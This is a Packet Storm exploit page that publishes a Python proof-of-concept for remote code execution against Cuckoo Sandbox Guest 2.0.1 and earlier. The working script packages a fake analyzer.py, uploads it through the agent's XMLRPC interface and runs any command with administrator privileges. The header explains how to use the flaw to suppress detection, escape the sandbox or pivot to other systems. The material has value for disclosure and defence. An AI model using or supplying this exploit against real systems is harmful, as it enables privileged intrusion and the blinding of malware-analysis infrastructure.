what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cuckoo Sandbox Guest 2.0.1 Code Execution

Cuckoo Sandbox Guest 2.0.1 Code Execution
Posted Jun 30, 2016
Authored by Remi ROCHER

Cuckoo Sandbox Guest versions 2.0.1 and below XMLRPC privilege remote code execution exploit.

tags | exploit, remote, code execution
SHA-256 | c0ec4947410116d6957300d0f302ff16f00765aa7038deb88954db8885fafbda

Cuckoo Sandbox Guest 2.0.1 Code Execution

Change Mirror Download
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None

--[ NAME

Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC

--[ DESCRIPTION

Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.

This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).

One may also call the complete() method in order to stop any further
detection
or screenshot.

Such vulnerabilities can be used to either trick the very detection
system, or
potentially escape the sandbox machine itself. An attacker could also
exploit
such bugs as a pivot in order to attack sensitive systems.

--[ AUTHORS

* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY- Armature Technologies

--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo


"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED


def execute(x, cmd="cmd /c start"):
output = StringIO()
file = ZipFile(output, "w", ZIP_STORED)
info = ZipInfo("analyzer.py")
info.compress_type = ZIP_DEFLATED

content = ("""
import subprocess

if __name__ == "__main__":
subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)

""" % cmd)
file.writestr(info, content)
file.close()

data = xmlrpclib.Binary(output.getvalue())

if x.add_analyzer(data):
return x.execute()


if __name__ == "__main__":
x = xmlrpclib.ServerProxy("http://localhost:8000")
execute(x, "calc.exe")
# x.complete() # Blackout mode

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close